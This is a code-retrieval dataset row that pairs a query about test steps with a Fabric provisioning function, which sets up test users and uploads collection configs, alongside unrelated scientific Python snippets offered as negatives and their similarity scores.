1:\n ax = np.reshape(ax,(1,self.n))\n if xnames == \"num\":\n xnames = []\n for i in range(self.n):\n xnames += [r\"state \"+str(i+1)]\n for row in range(Nrow):\n for col in range(Ncol):\n i = Ncol*row+col\n if i+1 <= self.n:\n ax[row,col].plot(this,xhis[:,i])\n ax[row,col].set_xlabel(r\"time\",fontsize=FontSize)\n LabelName = r\"tracking error: \"+xnames[i]\n ax[row,col].set_ylabel(LabelName,fontsize=FontSize)\n fig.suptitle(tit4,fontsize=FontSize)\n plt.show()\n print(\"========================================================\")\n print(\"==================== SIMULATIOM END ====================\")\n print(\"========================================================\")\n return this,xhis,zhis", "def prjEuler():\r\n #Constants\r\n NUMSTRING = ( \"73167176531330624919225119674426574742355349194934\"\r\n \"96983520312774506326239578318016984801869478851843\"\r\n \"85861560789112949495459501737958331952853208805511\"\r\n \"12540698747158523863050715693290963295227443043557\"\r\n \"66896648950445244523161731856403098711121722383113\"\r\n \"62229893423380308135336276614282806444486645238749\"\r\n \"30358907296290491560440772390713810515859307960866\"\r\n \"70172427121883998797908792274921901699720888093776\"\r\n \"65727333001053367881220235421809751254540594752243\"\r\n \"52584907711670556013604839586446706324415722155397\"\r\n \"53697817977846174064955149290862569321978468622482\"\r\n \"83972241375657056057490261407972968652414535100474\"\r\n \"82166370484403199890008895243450658541227588666881\"\r\n \"16427171479924442928230863465674813919123162824586\"\r\n \"17866458359124566529476545682848912883142607690042\"\r\n \"24219022671055626321111109370544217506941658960408\"\r\n \"07198403850962455444362981230987879927244284909188\"\r\n \"84580156166097919133875499200524063689912560717606\"\r\n \"05886116467109405077541002256983155200055935729725\"\r\n \"71636269561882670428252483600823257530420752963450\" )\r\n \r\n #defined items\r\n greatest_prod = 1\r\n euler_queue = fiveQueue()\r\n \r\n #code\r\n for numIter in NUMSTRING:\r\n if( euler_queue.push( numIter ) ):\r\n temp_prod = euler_queue.product()\r\n if( temp_prod > greatest_prod ):\r\n greatest_prod = temp_prod\r\n \r\n print \"The greatest product is %d\" % greatest_prod\r\n return", "def TST_LCE(S,N1,N_per,alpha,model_C2ST, w_C2ST, b_C2ST, device,dtype):\r\n np.random.seed(seed=1102)\r\n torch.manual_seed(1102)\r\n torch.cuda.manual_seed(1102)\r\n N = S.shape[0]\r\n f = torch.nn.Softmax()\r\n output = f(model_C2ST(S).mm(w_C2ST) + b_C2ST)\r\n # pred_C2ST = output.max(1, keepdim=True)[1]\r\n STAT = abs(output[:N1,0].type(torch.FloatTensor).mean() - output[N1:,0].type(torch.FloatTensor).mean())\r\n STAT_vector = np.zeros(N_per)\r\n for r in range(N_per):\r\n ind = np.random.choice(N, N, replace=False)\r\n # divide into new X, Y\r\n ind_X = ind[:N1]\r\n ind_Y = ind[N1:]\r\n # print(indx)\r\n STAT_vector[r] = abs(output[ind_X,0].type(torch.FloatTensor).mean() - output[ind_Y,0].type(torch.FloatTensor).mean())\r\n S_vector = np.sort(STAT_vector)\r\n threshold = S_vector[np.int(np.ceil(N_per * (1 - alpha)))]\r\n threshold_lower = S_vector[np.int(np.ceil(N_per * alpha))]\r\n h = 0\r\n if STAT.item() > threshold:\r\n h = 1\r\n return h, threshold, STAT", "def viterbi(self):\n # initialisation\n self.phi = zeros((self.noOfEmmittingStates+2, self.T + 1))\n self.phi[0,0] = 1.0\n for i in range(1,self.noOfEmmittingStates+2):\n self.phi[i,0] = 0.0\n for t in range(1,self.T+1):\n self.phi[0,t] = 0.0\n self.traceback = zeros((self.noOfEmmittingStates+1, self.T+1))\n\n # main recursion\n for t in range(1, self.T + 1):\n for j in range(1, self.noOfEmmittingStates + 1):\n phiTemp = zeros((self.noOfEmmittingStates + 1, 1))\n for k in range(self.noOfEmmittingStates+1):\n phiTemp[k,0] = self.phi[k,t-1] * self.transitionMatrix[k, j-1]\n self.traceback[j-1,t-1] = nonzero(phiTemp == phiTemp.max(0))[0][0]\n self.phi[j, t] = phiTemp.max(0) * self.b[j-1, t-1]\n\n # last column - set states which can't reach term to 0, sub for term\n for j in range(1,self.noOfEmmittingStates + 1):\n if self.transitionMatrix[j,-1] == 0:\n self.phi[j,-1] = 0\n phiTemp = zeros((self.noOfEmmittingStates+1, 1))\n for k in range(self.noOfEmmittingStates + 1):\n phiTemp[k,0] = self.phi[k,-1] * self.transitionMatrix[k,-1]\n self.traceback[-1,-1] = nonzero(phiTemp == phiTemp.max(0))[0][0]\n self.phi[-1,-1] = phiTemp.max(0)", "def bv2teff_noyes84(BmV):\n logTeff = 3.908 - 0.234*BmV\n return 10 ** logTeff", "def test_put_nveto_pmt_item(self):\n pass", "def verhulst(nb_init, t0, tf, eps, methode, gamma, K) :\n f=lambda y,t : gamma*y*(1-y/K)\n Y=meth_epsilon(nb_init, t0, tf, eps, f, methode)\n return Y", "def condition_tpm(self,tpm, fixed_nodes, state):\n conditioning_indices = [[slice(None)]] * len(state)\n for i in fixed_nodes:\n # Preserve singleton dimensions with `np.newaxis`\n conditioning_indices[i] = [state[i], np.newaxis]\n # Flatten the indices.\n conditioning_indices = list(chain.from_iterable(conditioning_indices))\n # Obtain the actual conditioned TPM by indexing with the conditioning\n # indices.\n return tpm[tuple(conditioning_indices)]" ]
[ "0.60359097", "0.57987505", "0.57006055", "0.56011873", "0.55925214", "0.5585051", "0.55665624", "0.55553573", "0.55482876", "0.5474939", "0.5453688", "0.5451362", "0.5410539", "0.540798", "0.54051346", "0.53952694", "0.5374782", "0.5306764", "0.529368", "0.5291805", "0.5266997", "0.52642155", "0.5263579", "0.52629596", "0.52576226", "0.5255918", "0.52539307", "0.5246281", "0.5243777", "0.52420783", "0.5236567", "0.5234393", "0.52333516", "0.5222849", "0.5222506", "0.5216175", "0.52156645", "0.5207879", "0.5202502", "0.5202053", "0.5183319", "0.51806957", "0.51802164", "0.51792824", "0.51780075", "0.5168686", "0.51591843", "0.5153175", "0.5141934", "0.51377934", "0.5125655", "0.5122806", "0.5093584", "0.5091972", "0.508602", "0.50794125", "0.5065431", "0.5060242", "0.5059197", "0.5055429", "0.50503534", "0.50456613", "0.50454193", "0.5038145", "0.5032157", "0.5027945", "0.5023213", "0.50205517", "0.5017924", "0.50165254", "0.50126743", "0.5012398", "0.50115186", "0.50061107", "0.5004287", "0.5003291", "0.5002768", "0.49898377", "0.49878567", "0.49827918", "0.49800187", "0.49797723", "0.49782142", "0.49759266", "0.49753386", "0.49750325", "0.49735662", "0.49702942", "0.49661687", "0.4965389", "0.49633935", "0.49573943", "0.4951992", "0.49513975", "0.4948265", "0.4947331", "0.49457684", "0.49409312", "0.49390656", "0.4934833", "0.49334392" ]
0.0
-1
Implementation of TPMINVNOM00001 Steps 2 4
def initialize(): with settings(prompts={'Password: ': 'test', 'Password (again): ': 'test'}): for user, group in USER_GROUPS: sudo("useradd %s -G %s,minv -g minv -N || true" % (user, group)) sudo("chmod g+rwx /home/%s" % user) sudo('minv_ createuser %s -g %s' % (user, group), user="minv") # upload script to create collections put( join(env.testdata_path, "scripts/initial_collections.sh"), "", mode=0755 ) sudo("cp initial_collections.sh /home/minv-app-administrator/") # upload collection configs for conf in glob(join(env.testdata_path, "configurations/*.conf")): put(conf, "", mode=0444, use_sudo=True) sudo("cp %s /home/minv-app-administrator/" % basename(conf)) with cd("/home/minv-app-administrator/"): sudo("chmod a+rx . *") sudo( "sh -l ./initial_collections.sh", user="minv-app-administrator" )
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def getTru(n,int_method,func) :\n m = np.asarray([0.5,1,1.5,2,2.5,3,3.5,4,4.5,5,6,7,8,9,10])\n bes = np.asarray([-0.5,0,0.43675,0.47773,0.49231,0.49316,0.49280,0.50325,\n 0.51140,0.52169,0.55823,0.58086,0.60463,0.61483,0.66995])\n p = np.asarray([1,0,0.61007,0.77491,0.84071,0.87689,0.89914,0.91365,\n 0.92449,0.93279,0.94451,0.95289,0.95904,0.96385,\n 0.96731])\n h1 = np.asarray([0,0,-0.07257,-0.04963,-0.03313,-0.02282,-0.01648,\n -0.01248,-0.00970,-0.00773,-0.00522,-0.00369,-0.00272,\n -0.00206,-0.00164])\n h2 = np.asarray([0,0,-0.20048,-0.15556,-0.12070,-0.09611,-0.07919,\n -0.06747,-0.05829,-0.05106,-0.04060,-0.03311,-0.02768,\n -0.02353,-0.02053])\n h3 = np.asarray([0,0,0.01647,0.08284,0.14390,0.19680,0.24168,0.27969,\n 0.31280,0.34181,0.39002,0.42942,0.46208,0.48997,0.51325])\n \n if (func == True) :\n int_bes = splev(n,splrep(m, bes))\n int_p = splev(n,splrep(m, p))\n int_h1 = splev(n,splrep(m, h1))\n int_h2 = splev(n,splrep(m, h2))\n int_h3 = splev(n,splrep(m, h3))\n else :\n int_bes = griddata(m, bes, n, method=int_method)\n int_p = griddata(m, p, n, method=int_method)\n int_h1 = griddata(m, h1, n, method=int_method)\n int_h2 = griddata(m, h2, n, method=int_method)\n int_h3 = griddata(m, h3, n, method=int_method)\n \n return np.asarray([int_bes,int_p,int_h1,int_h2,int_h3])", "def TR_algo3(h, vd=2):\n ve = 0\n vd = 2\n p = [0]*N\n for i in range(M-1, -1, -1):\n w = [bit_component(h, i*N+ii) for ii in range(N)]\n #print(i, w)\n w = sum( [wx*2**j for j, wx in enumerate(w)] )\n #print(i, w, gc(w))\n l = gc(w)\n l = T_inv(ve, vd, l)\n for j in range(N):\n p[j] += bit_component(l, j) << i\n ve = ve ^ rotate_left(e(w), vd+1)\n vd = (vd + d(w) + 1) % N\n return p", "def prove_NI() -> Proof:\n # Optional Task 6.7e", "def cond_depend_tpm():\n # fmt: off\n tpm = np.array([\n [1.0, 0.0, 0.0, 0.0],\n [0.0, 0.5, 0.5, 0.0],\n [0.0, 0.5, 0.5, 0.0],\n [0.0, 0.0, 0.0, 1.0],\n ])\n # fmt: on\n return tpm", "def prove_NN() -> Proof:\n # Optional Task 6.7c", "def tpm3_1_8_end_genomic():\n return \"TPM3\", \"NC_000001.11\", 154170399, 154170469, -1", "def ftlan_E1c(hop, v0, T, m=50, Min_b=10e-10, Min_m=5, kB=1, norm = np.linalg.norm):\n# def Tri_diag(a1, b1):\n# mat = np.diag(b1, -1) + np.diag(a1, 0) + np.diag(b1, 1)\n# e, w = np.linalg.eigh(mat)\n# return e, w\n\n beta = 1./(T * kB)\n E = 0.\n a, b = [], []\n v0 = v0/norm(v0)\n Hv = hop(v0)\n a.append(v0.dot(Hv))\n v1 = Hv - a[0] * v0\n b.append(norm(v1))\n if b[0] < Min_b:\n return 0\n\n v1 = v1/b[0]\n Hv = hop(v1)\n a.append(v1.dot(Hv))\n\n for i in range(1, m - 1):\n v2 = Hv - b[i - 1] * v0 - a[i] * v1\n b.append(norm(v2))\n if abs(b[i]) < Min_b:\n b.pop()\n break\n\n v2 = v2/b[i]\n Hv = hop(v2)\n a.append(v2.dot(Hv))\n v0 = v1.copy()\n v1 = v2.copy()\n \n a = np.asarray(a)\n b = np.asarray(b)\n\n eps, phi = Tri_diag(a, b)\n l = len(eps)\n# Eo = eps[0]\n# eps = eps-Eo\n exp_eps = np.exp(-beta * eps)\n E = np.sum(exp_eps * eps * phi[0, :]**2.)\n Z = np.sum(exp_eps * phi[0, :]**2.)\n# for i in range(len(eps)):\n# E += exp_eps[i] * eps[i] * phi[0, i]**2\n\n# E = E + Eo\n# de = eps[:, np.newaxis] - eps\n# for i in range(l):\n# E += eps[i] * phi[0, i]**2./np.sum(np.exp(-beta*de[:l, i])*(phi[0, :l]**2.))\n return E, Z", "def tpm3_1_8_start_genomic():\n return \"TPM3\", \"NC_000001.11\", 154191901, 154192135, -1", "def prove_CM() -> Proof:\n # Optional Task 6.7f", "def test_get_nveto_pmts(self):\n pass", "def test_create_tpm(self):\n command_line = self._MENU + [self._POOLNAME] + self._DEVICES + [\"--clevis=tpm2\"]\n TEST_RUNNER(command_line)", "def gen_ep_data(self,ntrials,trlen):\n self.resort_emat()\n ## instruction\n # for each trial, generate random instruction encoding sequence\n i_encoding_input = np.array([\n np.random.permutation(np.arange(1,self.nmaps+1)) \n for i in range(ntrials)\n ])\n i_test_input = np.zeros([ntrials,trlen])\n i_input = np.concatenate([\n i_encoding_input,i_test_input],\n 1).astype(int).reshape(-1) # (ntrials,trlen+)\n ## stimulus\n x_encoding_input = i_encoding_input\n x_test_input = np.random.randint(1,self.nmaps+1,[ntrials,trlen])\n x_input = np.concatenate([x_encoding_input,x_test_input],1)\n # print('X',x_input)\n ''' \n embed x_input: \n [ntrials,nmaps+trlen] -> s_input [ntrials*(nmaps+trlen),edim]\n explicit loop required for flatten and embedd x_input\n because if switchmaps=1, matrix is resorted between trials\n and therefore same stimulus token integers correspond to\n different stimulus embeddings on different trials\n '''\n s_input = -np.ones([ntrials,(self.nmaps+trlen),self.stimdim])\n for trialn,x_input_trial in enumerate(x_input): \n if self.switchmaps: self.resort_emat()\n s_input[trialn] = self.emat[x_input_trial]\n # format output\n i_input = tr.unsqueeze(tr.LongTensor(i_input),1)\n s_input = tr.unsqueeze(tr.Tensor(np.concatenate(s_input)),1)\n yseq = tr.unsqueeze(tr.LongTensor(x_input.reshape(-1)),1)\n return i_input,s_input,yseq", "def system(p):\r\n\r\n C1, C2, C3, C4, C5, C6, C7, C8, \\\r\n C9,C10,C11,C12,C13,C14,C15,C16,C17,C18,C19,C20,C21,C22, \\\r\n C23, C24, C25, C26, C27, C28, C29, C30, C31, C32, C33, C34,\\\r\n C35, C36, C37, C38, C39, C40, C41, C42, C43, \\\r\n C44, C45, C46, C47, C48, C49, C50, C51, C52, C53, C54, C55, C56 = p\r\n\r\n C = [C1, C2, C3, C4, C5, C6, C7, C8,\r\n C9,C10,C11,C12,C13,C14,C15,C16,C17,C18,C19,C20,C21,C22,\r\n C23, C24, C25, C26, C27, C28, C29, C30, C31, C32, C33, C34, C35, C36, C37,\r\n C38, C39, C40, C41, C42, C43,\r\n C44, C45, C46, C47, C48, C49, C50, C51, C52, C53, C54, C55, C56]\r\n\r\n eqs = [C[i] * (Kd[i] + Rtot - sum(C)) + Etot[i] * (sum(C) - Rtot) for i in range(n)]\r\n\r\n return eqs", "def stepFunction(Hin, m):\n if makeReport:\n reporter.addHeader2(\"stepFunction(%s,%s)\"%(hex(Hin), hex(m)))\n # step1. generating keys\n C2 = 0\n C3 = 0xff00ffff000000ffff0000ff00ffff0000ff00ff00ff00ffff00ff00ff00ff00\n C4 = 0\n U = Hin\n V = m\n W = U ^ V\n K1 = transformP(W)\n\n U = transformA(U)^C2\n V = transformA(transformA(V))\n W = U ^ V\n K2 = transformP(W)\n\n U = transformA(U)^C3\n V = transformA(transformA(V))\n W = U ^ V\n K3 = transformP(W)\n\n U = transformA(U)^C4\n V = transformA(transformA(V))\n W = U ^ V\n K4 = transformP(W)\n\n if makeReport:\n reporter.addBold(\"Generated keys:\")\n reporter.addList([hex(K1), hex(K2), hex(K3), hex(K4)])\n\n # step2. crypting tranformation\n Hin_cut = Hin # we need Hin for the next step, but this step cuts Hin\n h1 = cryptBlocks.getRight(Hin_cut, 64, True)\n Hin_cut = cryptBlocks.cutRight(Hin_cut, 64, True)\n h2 = cryptBlocks.getRight(Hin_cut, 64, True)\n Hin_cut = cryptBlocks.cutRight(Hin_cut, 64, True)\n h3 = cryptBlocks.getRight(Hin_cut, 64, True)\n Hin_cut = cryptBlocks.cutRight(Hin_cut, 64, True)\n h4 = cryptBlocks.getRight(Hin_cut, 64, True)\n Hin_cut = cryptBlocks.cutRight(Hin_cut, 64, True)\n s1 = gost28147.cryptBlock(h1, K1)\n s2 = gost28147.cryptBlock(h2, K2)\n s3 = gost28147.cryptBlock(h3, K3)\n s4 = gost28147.cryptBlock(h4, K4)\n S = s4\n S = cryptBlocks.concat(S, s3, 64)\n S = cryptBlocks.concat(S, s2, 64)\n S = cryptBlocks.concat(S, s1, 64)\n if makeReport:\n reporter.addBold(\"Crypting transformation:\")\n reporter.addList([\n \"gost28147(%s,%s)=%s\"%(hex(h1),hex(K1),hex(s1)),\n \"gost28147(%s,%s)=%s\"%(hex(h2),hex(K2),hex(s2)),\n \"gost28147(%s,%s)=%s\"%(hex(h3),hex(K3),hex(s3)),\n \"gost28147(%s,%s)=%s\"%(hex(h4),hex(K4),hex(s4)),\n ])\n reporter.addBold(\"S=\"+hex(S))\n # Step 3. Shuffle transforming.\n Hout = transformPsi(S)\n for i in range(12):\n Hout = transformPsi(Hout)\n Hout = transformPsi(Hout ^ m)^Hin\n for i in range(61):\n Hout = transformPsi(Hout)\n return Hout", "def prove_N() -> Proof:\n # Optional Task 6.8", "def TMM(x,N,n,trun_basis):\n Mat = np.zeros([len(trun_basis),len(trun_basis)])\n print('making TMM')\n perms = [int((x**n * iii)%N) for iii in trun_basis] # Modular multiplication\n for iii in range(len(trun_basis)):\n if trun_basis.__contains__(perms[iii]):\n Mat[iii,trun_basis.index(perms[iii])] = 1\n return Mat", "def _r_inv(self):\n raise NotImplementedError", "def gen_ep_data(self,ntrials,trlen):\n ## instruction\n # for each trial, generate random instruction encoding sequence\n i_encoding_input = np.array([\n np.random.permutation(np.arange(1,self.nmaps+1)) \n for i in range(ntrials)\n ])\n i_test_input = np.zeros([ntrials,trlen])\n i_input = np.concatenate([\n i_encoding_input,i_test_input],\n 1).astype(int).reshape(-1) # (ntrials,trlen+)\n ## stimulus\n x_encoding_input = i_encoding_input\n x_test_input = np.random.randint(1,self.nmaps+1,[ntrials,trlen])\n x_input = np.concatenate([i_encoding_input,x_test_input],1)\n ''' \n embed x_input: \n [ntrials,nmaps+trlen] -> s_input [ntrials*(nmaps+trlen),edim]\n explicit loop required for flatten and embedd x_input\n because if switchmaps=1, matrix is resorted between trials\n and therefore same stimulus token integers correspond to\n different stimulus embeddings on different trials\n '''\n s_input = -np.ones([ntrials,(self.nmaps+trlen),self.stimdim])\n for trialn,x_input_trial in enumerate(x_input): \n if self.switchmaps: self.resort_emat()\n s_input[trialn] = self.emat[x_input_trial]\n \n # format output\n i_input = tr.unsqueeze(tr.LongTensor(i_input),1)\n s_input = tr.unsqueeze(tr.Tensor(np.concatenate(s_input)),1)\n yseq = tr.unsqueeze(tr.LongTensor(x_input.reshape(-1)),1)\n if return_trial_flag:\n tr_flag = np.concatenate([i*np.ones(self.nmaps+trlen) for i in range(ntrials)])\n tr_flag = tr.unsqueeze(tr.LongTensor(tr_flag),1)\n return tr_flag,i_input,s_input,yseq,\n else:\n return i_input,s_input,yseq", "def createCNDTransEmiProb(self, qtc_type='qtcc'):\n \n if qtc_type == 'qtcb':\n state_num = 11\n elif qtc_type == 'qtcc':\n state_num = 83\n elif qtc_type == 'qtcbc':\n state_num = 92\n else:\n raise(QtcException(\"createCNDTransEmiProb: Unknow qtc type: {!r}\".format(qtc_type)))\n \n qtc = []\n \n if qtc_type == 'qtcb':\n for i in xrange(1, 4):\n for j in xrange(1, 4):\n qtc.append([i-2, j-2])\n elif qtc_type == 'qtcc':\n for i in xrange(1, 4):\n for j in xrange(1, 4):\n for k in xrange(1, 4):\n for l in xrange(1, 4):\n qtc.append([i-2, j-2, k-2, l-2])\n elif qtc_type == 'qtcbc':\n for i in xrange(1, 4):\n for j in xrange(1, 4):\n qtc.append([i-2, j-2, np.NaN, np.NaN])\n for i in xrange(1, 4):\n for j in xrange(1, 4):\n for k in xrange(1, 4):\n for l in xrange(1, 4):\n qtc.append([i-2, j-2, k-2, l-2])\n else:\n raise(QtcException(\"createCNDTransEmiProb: Unknow qtc type: {!r}\".format(qtc_type)))\n \n qtc = np.array(qtc)\n #np.savetxt('/home/cdondrup/qtc.csv', qtc, delimiter=',', fmt='%1f')\n \n trans = np.zeros((state_num, state_num))\n for i1 in xrange(qtc.shape[0]):\n for i2 in xrange(i1+1, qtc.shape[0]):\n trans[i1+1, i2+1] = np.nanmax(np.absolute(qtc[i1]-qtc[i2])) != 2\n if trans[i1+1, i2+1] == 1:\n for j1 in xrange(qtc.shape[1]-1):\n for j2 in xrange(j1+1, qtc.shape[1]):\n if sum(np.absolute(qtc[i1, [j1, j2]])) == 1 \\\n and sum(np.absolute(qtc[i2, [j1, j2]])) == 1:\n if np.nanmax(np.absolute(qtc[i1, [j1, j2]]-qtc[i2, [j1, j2]])) > 0 \\\n and sum(qtc[i1, [j1, j2]]-qtc[i2, [j1,j2]]) != 1:\n trans[i1+1, i2+1] = 5\n break\n if trans[i1+1, i2+1] != 1:\n break\n trans[i2+1, i1+1] = trans[i1+1, i2+1]\n \n trans[trans != 1] = 0\n #np.savetxt('/home/cdondrup/trans.csv', np.rint(trans).astype(int), delimiter=',', fmt='%i')\n trans[trans == 0] = 0.00001\n trans[0] = 1\n trans[:, 0] = 0\n trans[:, -1] = 1\n trans[0, -1] = 0\n trans[-1] = 0\n trans += np.dot(np.eye(state_num), 0.00001)\n trans[0, 0] = 0\n \n trans = trans / trans.sum(axis=1).reshape(-1, 1)\n #np.savetxt('/home/cdondrup/trans.csv', trans, delimiter=',')\n \n emi = np.eye(state_num)\n emi[emi == 0] = 0.0001\n \n return trans, emi", "def test_post_nveto_pmts(self):\n pass", "def ER_Theory(N,Kappa) :\n\tMu2 = Kappa - ( 2*Kappa*(1.0 - (Kappa/N))*math.log(N) )**0.5 + (( (Kappa*(1.0 - (Kappa/N)))/math.log(N) )**0.5)*( math.log( (2*math.pi*math.log((N**2)/(2*math.pi))) ) - 0.5772)\n\treturn Mu2", "def simulating_verlet(n,N,D,t,Rv,sigma,epsilon,dt,m,T,dim,kb,V,steps_r):\n Ekinv = np.zeros((n,1))\n Epotv = np.zeros((n,1))\n Ev = np.zeros((n,1))\n Gpc = np.zeros((steps_r,n))\n for k in range(len(t)):\n F = particle_forceV(Rv[-1], N, sigma, epsilon, D)\n Rv.append(particle_positionV(copy.deepcopy(Rv[-1]), V, dt, F, D)) \n V = particle_velocityV(V, F, dt, Rv, sigma, epsilon, D, N)\n Ekinv[k] = np.sum(1/(2*m)*(V**2))\n \n #Calibration\n if (int(k%(10)) == int(0) & int(k)<int(len(t)/2)):\n V = calibration(N, kb,T,Ekinv[k],V)\n Ekinv[k] = np.sum(1/(2*m)*(V**2))\n if int(k)> int(len(t)-50):\n Gpc[:,k], dist, dr = pair_correlation(N,Rv[-1],D,steps_r)\n Uv = particle_LJV(Rv[-1], N, D) \n Epotv[k] = abs(Uv)/2 \n Ev[k] = Ekinv[k]+Epotv[k]\n return Rv, Ekinv, Epotv, Ev, Gpc", "def TCVB0(docs, alpha, beta, epsilon=0.0001, log=no_log):\n D, V = docs.shape\n K = len(alpha)\n\n #store variational q_{z_{d,w} = t} for each d as sparse table in\n #array z\n z = np.zeros(D, dtype=object)\n\n #initialize counts\n #N[t, w] = expectaction of unnormalized phi_{k,w}\n N = np.zeros((V, K), dtype=float)\n\n #Nd[d, t] = unnormalized theta_{d,k}\n Nd = np.zeros((D, K), dtype=float)\n\n for d in xrange(D):\n #random initialization\n init = rand(docs[d].nnz * K)\n active_words = docs[d].nonzero()[1]\n ij = (np.repeat(active_words, K), np.tile(np.arange(K), len(active_words)))\n\n #z[d] is VxK sparse row matrix\n z[d] = csr_matrix((init, ij), shape=(V, K))\n\n #normalize z[d]\n z[d] = normalize(z[d], norm='l1', axis=1)\n\n #update counts\n #set_trace()\n M = diag(docs[d]).dot(z[d]).toarray()\n N += M\n Nd[d] = M.sum(axis=0) + alpha\n\n log('document %d/%d preinitialized' % (d + 1, D))\n\n #sum of array and matrix is matrix, so convertion is required\n N = np.asarray(N) + beta\n\n #Nt[t] is pre-computed unnormalized expectation topic t\n Nt = np.squeeze(np.asarray(N.sum(axis=0)))\n if type(beta) is float:\n Nt += V * beta\n elif type(beta) is np.ndarray:\n Nt += beta.sum(axis=0)\n else:\n raise 'beta must be either scalar (float) number for symmetric prior or a full matrix VxK for custom prior'\n\n #do variational updates until convergence\n iteration = 1\n while True:\n iteration_time = time()\n avg_diff = 0.0\n\n #for each document\n for d in xrange(D):\n #for each word in a document\n max_diff = 0.0\n doc_diff = 0.0\n\n doc_w = docs.data[docs.indptr[d]:docs.indptr[d + 1]]\n\n i = 0\n old_z_d = z[d].data.copy()\n #for each word in the document d\n #do variational update and estimate difference\n for w in docs.indices[docs.indptr[d]:docs.indptr[d + 1]]:\n #save old q(z_d) distribution\n old_z = z[d].data[z[d].indptr[w]:z[d].indptr[w + 1]] * doc_w[i]\n #we take expectations ignoring current document and current word\n N[w] -= old_z\n Nt[:] -= old_z\n Nd[d] -= old_z\n #update\n new_z = N[w] / Nt * Nd[d]\n #normalization\n new_z /= new_z.sum()\n #write new values back\n z[d].data[z[d].indptr[w]:z[d].indptr[w + 1]] = new_z\n #expectations update\n new_z *= doc_w[i]\n N[w] += new_z\n Nt[:] += new_z\n Nd[d] += new_z \n\n i += 1\n\n #word_diff = variational_update(d, w)\n doc_diff += np.abs(old_z_d - z[d].data)\n avg_diff += doc_diff.sum()\n max_diff = max(max_diff, doc_diff.max())\n if d % 100 == 0:\n log('document %d/%d was updated' % (d + 1, D))\n\n avg_diff /= docs.nnz * K\n log('iteration %d. avg diff: %f. max diff: %f. time: %f' % (iteration, avg_diff, max_diff, time() - iteration_time))\n\n if max_diff < epsilon:\n break\n\n iteration += 1\n\n return z", "def ev2vi_nrl(eV,mu):\n return 9.79e3/np.sqrt(mu)*np.sqrt(2.*eV)", "def calcualte_inte_vn(pT_low, pT_high, data):\n npT = 50\n pT_inte_array = linspace(pT_low, pT_high, npT)\n dpT = pT_inte_array[1] - pT_inte_array[0]\n dN_event = data[:, 2]\n pT_event = data[:, 0]\n dN_interp = exp(interp(pT_inte_array, pT_event, log(dN_event+1e-30)))\n N_event = data[:, -1]\n N_interp = exp(interp(pT_inte_array, pT_event, log(N_event+1e-30)))\n N = sum(N_interp)*dpT/0.1\n temp_vn_array = [N,]\n for iorder in range(1, n_order):\n vn_real_event = data[:, 4*iorder]\n vn_imag_event = data[:, 4*iorder+2]\n vn_real_interp = interp(pT_inte_array, pT_event, vn_real_event)\n vn_imag_interp = interp(pT_inte_array, pT_event, vn_imag_event)\n vn_real_inte = (\n sum(vn_real_interp*dN_interp*pT_inte_array)\n /sum(dN_interp*pT_inte_array))\n vn_imag_inte = (\n sum(vn_imag_interp*dN_interp*pT_inte_array)\n /sum(dN_interp*pT_inte_array))\n vn_inte = vn_real_inte + 1j*vn_imag_inte\n temp_vn_array.append(vn_inte)\n return(temp_vn_array)", "def vinet(p, v):\n x = ( v / p[3] ) ** ( 1.0 / 3 )\n xi = 3.0 / 2 * ( p[2] - 1 )\n return p[0] + 9 * p[1] * p[3] / ( xi**2 ) * ( 1 + ( xi * ( 1 - x ) - 1 ) * np.exp( xi * ( 1 - x ) ) )", "def intf_ENTPGRAM(E):\n # !! Need to check for some eids being TRIs. Filter that out.\n if ( not inc.entid_or_LST_of_entids(E.The,3) or \n not inc.point_formatted_LST(E.The,2) or\n not inc.point_formatted_LST(E.The,1) ):\n print(\"Input Error: pgram\")\n print(intf_ENTPGRAM.__doc__)\n return # Without doing much of anything.\n oB= [ xyz.val for xyz in E.The.StackPop().val ] # A list [3.5 -2 0].\n oA= [ xyz.val for xyz in E.The.StackPop().val ] # A list [3.5 -2 0].\n myeids= E.The.StackPop().val\n if type(myeids)==type(list()):\n #myeids= map(lambda x:x.val, myeids) # Should now be a list of ints.\n myeids= [x.val for x in myeids] # Should now be a list of ints.\n else:\n myeids= [ myeids ] # Also a (1 item) list of ints.\n neweidlist= []\n for myeid in myeids:\n if myeid in MMEL.El: # Check if eid exists.\n src_ent= MMEL.El[myeid]\n new_ent= src_ent.duplicate()\n new_ent.translate([ oB[0]-oA[0], oB[1]-oA[1], oB[2]-oA[2] ])\n As= mm.Entity.allplist.PLdict[ src_ent.epts[0] ]\n Ae= mm.Entity.allplist.PLdict[ src_ent.epts[1] ]\n Bs= mm.Entity.allplist.PLdict[ new_ent.epts[0] ]\n Be= mm.Entity.allplist.PLdict[ new_ent.epts[1] ]\n neweidlist.append(new_ent.eid)\n MMEL.add_ent(new_ent)\n line_entS= mm.Line_Entity( [As,Bs] )\n neweidlist.append(line_entS.eid)\n MMEL.add_ent(line_entS)\n line_entE= mm.Line_Entity( [Ae,Be] )\n neweidlist.append(line_entE.eid)\n MMEL.add_ent(line_entE)\n tri_entA= mm.Tri_Entity( [As, Ae, Bs] )\n neweidlist.append(tri_entA.eid)\n MMEL.add_ent(tri_entA)\n tri_entB= mm.Tri_Entity( [Bs, Be, Ae] )\n neweidlist.append(tri_entB.eid)\n MMEL.add_ent(tri_entB)\n else:\n print(\"WARNING: Entity ID# %d does not exist.\" % myeid)\n if neweidlist:\n neweids= objectifier.StackOB_LST( [objectifier.StackOB_VAL(x) for x in neweidlist] )\n E.The.StackPush(neweids)\n OUT.default(MMEL,E) # AUTODUMP ", "def _inv_totient_estimate(m):\n primes = [ d + 1 for d in divisors(m) if isprime(d + 1) ]\n\n a, b = 1, 1\n\n for p in primes:\n a *= p\n b *= p - 1\n\n L = m\n U = int(math.ceil(m*(float(a)/b)))\n\n P = p = 2\n primes = []\n\n while P <= U:\n p = nextprime(p)\n primes.append(p)\n P *= p\n\n P //= p\n b = 1\n\n for p in primes[:-1]:\n b *= p - 1\n\n U = int(math.ceil(m*(float(P)/b)))\n\n return L, U", "def test_nr_trinuc(self):\n preds = [\n MotifChange(\"A\", \"C\"),\n MotifChange(\"G\", \"A\"),\n MotifChange(\"CGA\", \"TGA\"),\n ]\n sm = substitution_model.TimeReversibleTrinucleotide(predicates=preds)\n got = sm.get_param_list()\n self.assertEqual(got, [\"A/C\", \"G/A\", \"CGA/TGA\"])\n self.assertEqual(len(sm.get_motifs()), 64)", "def N_TT_EB(self, L):\n if L>2.*min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n # integrand\n def integrand(x):\n theta = x[1]\n l1 = 